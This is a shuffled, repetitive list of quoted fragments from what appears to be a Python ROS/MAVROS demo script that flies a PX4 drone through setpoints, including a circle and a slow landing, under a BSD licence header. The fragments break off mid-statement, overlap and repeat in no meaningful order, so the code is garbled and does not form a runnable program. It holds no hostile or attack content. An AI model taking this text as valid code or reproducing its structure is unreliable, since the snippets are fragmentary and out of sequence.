"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF",
"2. Redistributions in binary form must reproduce the above copyright # * notice,",
"0.0 offset_z = 10.0 sides = 360 radius = 20 print \"Fly in",
"msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z =",
"2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2,",
"rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y = 0.0",
"quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z,",
"wait=True): self.done = False self.x = x self.y = y self.z = z",
"8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x =",
"= quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y,",
"= i + 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0,",
"0 or i == sides): # Let it reach the setpoint. wait =",
"# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS",
"OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import threading",
"self.y = y self.z = z if wait: rate = rospy.Rate(5) while not",
"# * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT",
"OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self,",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY",
"Let it reach the setpoint. wait = True delay = 5 setpoint.set(x, y,",
"# * without specific prior written permission. # * # * THIS SOFTWARE",
"sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay = 0 if",
"documentation and/or other materials provided with the # * distribution. # * 3.",
"threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from",
"# * 3. Neither the name PX4 nor the names of its contributors",
"if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break #",
"STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #",
"OF THE # * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import",
"* the documentation and/or other materials provided with the # * distribution. #",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY",
"try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\" #",
"* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # *",
"delay = 5 setpoint.set(x, y, z, delay, wait) i = i + 1",
"radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z",
"to start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt =",
"landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2)",
"0 if (i == 0 or i == sides): # Let it reach",
"== sides): # Let it reach the setpoint. wait = True delay =",
"* 1. Redistributions of source code must retain the above copyright # *",
"import * from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import",
"* 2. Redistributions in binary form must reproduce the above copyright # *",
"- self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True",
"**************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg import PoseStamped,",
"* \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #",
"to the starting height first i = 0 while not rospy.is_shutdown(): x =",
"import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import *",
") except: print \"Error: Unable to start thread\" # TODO(simon): Clean this up.",
"are met: # * # * 1. Redistributions of source code must retain",
"AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. #",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS",
"* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # *",
"print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y",
"self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5",
"* 3. Neither the name PX4 nor the names of its contributors may",
"* sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay = 0",
"self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try:",
"while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For",
"FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL",
"# North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion)",
"the following disclaimer in # * the documentation and/or other materials provided with",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\"",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR",
"+ 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0,",
"= threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) #",
"ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # * # ****************************************************************************",
"if (i == 0 or i == sides): # Let it reach the",
"PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header",
"HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"this list of conditions and the following disclaimer. # * 2. Redistributions in",
"set(self, x, y, z, delay=0, wait=True): self.done = False self.x = x self.y",
"self.z = z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay)",
"< 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def",
"DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # *",
"def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint",
"5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2)",
"GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS",
"HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep()",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY",
"rights reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution and",
"* modification, are permitted provided that the following conditions # * are met:",
"# TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub =",
"NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #",
"def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0",
"anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0,",
"setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0,",
"* notice, this list of conditions and the following disclaimer. # * 2.",
"demo purposes we will lock yaw/heading to north. yaw_degrees = 0 # North",
"CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"* from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler",
"* POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread",
"if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic):",
"from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub",
"the name PX4 nor the names of its contributors may be # *",
"# * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #",
"conditions and the following disclaimer in # * the documentation and/or other materials",
"distribution. # * 3. Neither the name PX4 nor the names of its",
"<<EMAIL>> # * # * Redistribution and use in source and binary forms,",
"met: # * # * 1. Redistributions of source code must retain the",
"i = i + 1 rate.sleep() if (i > sides): print \"Fly home\"",
"the above copyright # * notice, this list of conditions and the following",
"a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0,",
"2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo()",
"x, y, z, delay=0, wait=True): self.done = False self.x = x self.y =",
"wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print",
"and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done",
"used to endorse or promote products derived from this software # * without",
"EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY",
"print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the",
"of conditions and the following disclaimer in # * the documentation and/or other",
"10.0, 3) # Climb to the starting height first i = 0 while",
"print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the",
"10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\"",
"print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0,",
"self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10)",
"rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z #",
"Quaternion from math import * from mavros.srv import CommandBool from mavros.utils import *",
"code must retain the above copyright # * notice, this list of conditions",
"DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE",
"or i == sides): # Let it reach the setpoint. wait = True",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON",
"rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id =",
"CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose',",
"= 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () )",
"0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0,",
"above copyright # * notice, this list of conditions and the following disclaimer.",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF",
"(INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def",
"0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except:",
"the starting height first i = 0 while not rospy.is_shutdown(): x = radius",
"OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides)",
"3) # Climb to the starting height first i = 0 while not",
"**************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All rights reserved.",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR",
"pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z = 0.0",
"msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done",
"0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius = 20",
"rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0)",
"in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height",
"or promote products derived from this software # * without specific prior written",
"\"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z",
"= Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x",
"10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0,",
"All rights reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution",
"and binary forms, with or without # * modification, are permitted provided that",
"specific prior written permission. # * # * THIS SOFTWARE IS PROVIDED BY",
"1. Redistributions of source code must retain the above copyright # * notice,",
"= self.y msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading",
"False delay = 0 if (i == 0 or i == sides): #",
"* # * Redistribution and use in source and binary forms, with or",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # *",
"purposes we will lock yaw/heading to north. yaw_degrees = 0 # North yaw",
"abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z",
"offset_z = 10.0 sides = 360 radius = 20 print \"Fly in a",
"5 setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep() if",
"rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print",
"COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"# * the documentation and/or other materials provided with the # * distribution.",
"that the following conditions # * are met: # * # * 1.",
"= True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate",
"break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0,",
"or without # * modification, are permitted provided that the following conditions #",
"# * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #",
"setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0,",
"following conditions # * are met: # * # * 1. Redistributions of",
"delay = 0 if (i == 0 or i == sides): # Let",
"= 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0,",
"conditions # * are met: # * # * 1. Redistributions of source",
"time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import",
"LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"Redistribution and use in source and binary forms, with or without # *",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER",
"list of conditions and the following disclaimer in # * the documentation and/or",
"< 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10)",
"setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first i =",
"0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0,",
"with or without # * modification, are permitted provided that the following conditions",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE,",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL,",
"= 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb",
"FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"provided with the # * distribution. # * 3. Neither the name PX4",
"setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0,",
"endorse or promote products derived from this software # * without specific prior",
"import rospy import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE",
"# * 2. Redistributions in binary form must reproduce the above copyright #",
"3. Neither the name PX4 nor the names of its contributors may be",
"import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def",
"BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY,",
"self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, ()",
"copyright # * notice, this list of conditions and the following disclaimer in",
"= radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def",
"ts=4 sw=4 et: # # # **************************************************************************** # * # * Copyright (c)",
"the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0,",
"CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String",
"= Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5)",
"print \"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done =",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # *",
"SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR",
"ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS",
"msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while",
"1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo",
"5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2)",
"z, delay, wait) i = i + 1 rate.sleep() if (i > sides):",
"# * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # *",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA,",
"topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5",
"import CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import",
"form must reproduce the above copyright # * notice, this list of conditions",
"permitted provided that the following conditions # * are met: # * #",
"= 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation",
"sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow",
"setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep() if (i",
"3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print",
"# * are met: # * # * 1. Redistributions of source code",
"AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides =",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS",
"2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2)",
"= rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg =",
"source and binary forms, with or without # * modification, are permitted provided",
"LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"be # * used to endorse or promote products derived from this software",
"modification, are permitted provided that the following conditions # * are met: #",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE",
"WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\"",
"INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT",
"geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from",
"abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done =",
"name PX4 nor the names of its contributors may be # * used",
"DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"promote products derived from this software # * without specific prior written permission.",
"MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub,",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY",
"import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub",
"rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z,",
"conditions and the following disclaimer. # * 2. Redistributions in binary form must",
"radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) #",
"to endorse or promote products derived from this software # * without specific",
"setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to",
"== 0 or i == sides): # Let it reach the setpoint. wait",
"while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius",
"SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR",
"= rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread(",
"above copyright # * notice, this list of conditions and the following disclaimer",
"prior written permission. # * # * THIS SOFTWARE IS PROVIDED BY THE",
"# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #",
"# * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"# Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5)",
"rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped()",
"materials provided with the # * distribution. # * 3. Neither the name",
"* # * 1. Redistributions of source code must retain the above copyright",
"4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x",
"DAMAGE. # * # **************************************************************************** import rospy import thread import threading import time",
"# # # **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG.",
"starting height first i = 0 while not rospy.is_shutdown(): x = radius *",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY,",
"# **************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg import",
"from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header from",
"self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set()",
"8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly",
"setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0,",
"\"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0,",
"10.0 sides = 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0,",
"must retain the above copyright # * notice, this list of conditions and",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"first i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) +",
"in # * the documentation and/or other materials provided with the # *",
"without specific prior written permission. # * # * THIS SOFTWARE IS PROVIDED",
"5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360",
"y, z, delay, wait) i = i + 1 rate.sleep() if (i >",
"notice, this list of conditions and the following disclaimer. # * 2. Redistributions",
"# * 1. Redistributions of source code must retain the above copyright #",
"0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation =",
"Unable to start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt",
"setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print",
"= rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy)",
"\"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting",
"sides): # Let it reach the setpoint. wait = True delay = 5",
"= self.z # For demo purposes we will lock yaw/heading to north. yaw_degrees",
"8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0,",
"def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x)",
"sides = 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0,",
"math import * from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF",
"<NAME> <<EMAIL>> # * # * Redistribution and use in source and binary",
"String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub =",
"TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local',",
"PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\"",
"left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z =",
"pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub,",
"20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to",
"sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH",
"# vim:set ts=4 sw=4 et: # # # **************************************************************************** # * # *",
"# For demo purposes we will lock yaw/heading to north. yaw_degrees = 0",
"delay, wait) i = i + 1 rate.sleep() if (i > sides): print",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"* # * Copyright (c) 2015 UAVenture AG. All rights reserved. # *",
"retain the above copyright # * notice, this list of conditions and the",
"* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED",
"= True delay = 5 setpoint.set(x, y, z, delay, wait) i = i",
"self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we will",
"msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y =",
"# Let it reach the setpoint. wait = True delay = 5 setpoint.set(x,",
"# * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to",
"Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>>",
"rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False self.x =",
"disclaimer in # * the documentation and/or other materials provided with the #",
